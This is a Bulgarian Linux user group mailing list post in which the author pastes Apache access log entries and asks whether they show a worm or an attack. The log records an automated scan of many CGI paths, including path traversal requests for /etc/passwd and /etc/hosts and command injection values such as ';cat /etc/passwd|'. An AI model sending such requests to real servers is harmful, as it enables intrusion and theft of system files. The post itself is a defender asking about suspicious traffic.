|
lug-bg: Страмни неща в логовете на апачи
- Subject: lug-bg: Страмни неща в логовете на апачи
- From: "Alexander N" <sasho@xxxxxxxxxxxxxxx>
- Date: Sun, 3 Jul 2005 22:24:22 +0200
- Delivered-to: lug-bg-list@xxxxxxxxxxxxxxxxxx
- Delivered-to: lug-bg@xxxxxxxxxxxxxxxxxx
.... лога на апачито е пълен с такива ...Въпроса ми е тва някъв вирус/червей
ли е или опит за атака ?-------------------------- 194.106.99.61 - -
[27/Nov/2001:13:10:33 +0200] "HEAD / HTTP\1.0" 200 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /// HTTP/1.0" 200 0 "-"
"-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD ///server-info
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD ///server-status
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /site/eg/ HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /doc/ HTTP/1.0" 404 0
"-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /~nobody/ HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD ///manual/ HTTP/1.0"
200 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/ HTTP/1.0" 403
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/ad.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/aglimpse
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/AnyForm2
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/bbs_forum.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/bsguest.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/bslist.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/campas
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /// HTTP/1.0" 200 0 "-"
"-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD ///carbo.ddl HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/count.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/cgforum.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/faxsurvey
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/gbook.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/htsearch
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/htmlscript
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/jj HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /technote/ HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/mmstdod.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/newdesk
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/register.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/statusconfig.pl HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/webgais
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /iisadmpwd/ HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/webgais
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/perl.exe
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-dos/ HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /scripts/ HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/infosrch.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/rguest.exe
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /mall_log_files/
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /Admin_files/ HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET ///quote.html HTTP/1.0"
404 280 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
HTTP/1.0" 404 287 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/dcboard.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET /cgi-bin/nph-maillist.pl
HTTP/1.0" 404 291 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=v
iew&matchview=1 HTTP/1.0" 404 288 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
/passwd HTTP/1.0" 404 291 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/ikonboard/
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /foldoc/ HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/adcycle/
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 285 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/bbs_forum.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404
0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
HTTP/1.0" 404 286 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 283 "-"
"-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/mailnews.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/newsdesk.cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/pals-cgi
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /ROADS/ HTTP/1.0" 404 0
"-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 287 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /way-board/ HTTP/1.0"
404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404
288 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD
/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "HEAD /cgi-bin/a1stats/
HTTP/1.0" 404 0 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET /cgi-bin/get32.exe
HTTP/1.0" 404 285 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0"
404 287 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 279 "-"
"-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404
285 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20
HTTP/1.0" 404 284 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:43 +0200] "GET
/cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 284 "-" "-"
194.106.99.61 - - [27/Nov/2001:13:10:47 +0200] "HEAD / HTTP\1.0" 200 0 "-"
"-"
|
|
|